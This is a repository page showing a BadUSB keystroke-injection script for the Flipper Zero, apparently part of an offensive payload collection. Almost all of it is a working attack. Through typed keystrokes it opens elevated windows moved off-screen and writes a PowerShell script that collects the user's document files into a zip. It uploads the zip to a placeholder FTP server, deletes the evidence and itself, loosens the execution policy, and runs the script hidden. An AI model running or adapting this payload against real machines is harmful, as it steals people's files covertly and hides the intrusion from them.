aaron/flipper-zero-stuff
aaron/flipper-zero-stuff
1
0
Fork 0
Code Issues Pull requests Actions Packages Projects Releases Wiki Activity
flipper-zero-stuff/badusb/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Document_Exfil/Exfiltrate_Documents.txt

115 lines
3.4 KiB
Plaintext
Raw Permalink Normal View History

commit muder
2024-08-14 08:38:30 -07:00
REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
REM Description: Exfiltrate documents and upload them to a ftp server.
REM Version: 1.0
REM Category: Exfiltration
DELAY 800
GUI r
DELAY 1000
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 800
ALT y
DELAY 800
ENTER
ALT SPACE
DELAY 1000
STRING m
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')
ENTER
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime
ENTER
STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory
ENTER
STRING $date = get-date
ENTER
STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"
ENTER
STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'
ENTER
STRING $Report = $Report + "<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"
ENTER
STRING $Report = $Report + '<div id=center><h3>User Documents (doc,docx,pdf,rar)</h3>'
ENTER
STRING $Report = $Report + (Get-ChildItem -Path $userDir -Include *.doc, *.docx, *.pdf, *.zip, *.rar -Recurse |convertto-html Directory, Name, LastAccessTime)
ENTER
STRING $Report = $Report + '</div>'
ENTER
STRING $Report >> $fileSaveDir'/ComputerInfo.html'
ENTER
STRING function copy-ToZip($fileSaveDir){
ENTER
STRING $srcdir = $fileSaveDir
ENTER
STRING $zipFile = 'C:\Windows\Report.zip'
ENTER
STRING if(-not (test-path($zipFile))) {
ENTER
STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
ENTER
STRING (dir $zipFile).IsReadOnly = $false}
ENTER
STRING $shellApplication = new-object -com shell.application
ENTER
STRING $zipPackage = $shellApplication.NameSpace($zipFile)
ENTER
STRING $files = Get-ChildItem -Path $srcdir
ENTER
STRING foreach($file in $files) {
ENTER
STRING $zipPackage.CopyHere($file.FullName)
ENTER
STRING while($zipPackage.Items().Item($file.name) -eq $null){
ENTER
STRING Start-sleep -seconds 1 }}}
ENTER
STRING copy-ToZip($fileSaveDir)
ENTER
STRING $final = 'C:\Windows\Report.zip'
ENTER
STRING $ftpAddr = "ftp://username:password@ftp.host.com/Report.zip"
ENTER
STRING $browser = New-Object System.Net.WebClient
ENTER
STRING $url = New-Object System.Uri($ftpAddr)
ENTER
STRING $browser.UploadFile($url, $final)
ENTER
STRING remove-item $fileSaveDir -recurse
ENTER
STRING remove-item 'C:\Windows\Report.zip'
ENTER
STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL s
DELAY 800
STRING C:\Windows\config-58477.ps1
ENTER
DELAY 1000
ALT F4
DELAY 800
GUI r
DELAY 800
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 800
ALT y
DELAY 1000
STRING mode con:cols=14 lines=1
ENTER
ALT SPACE
DELAY 800
STRING m
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 800
STRING powershell.exe -windowstyle hidden -File C:\Windows\config-58477.ps1
ENTER
Reference in a new issue Copy permalink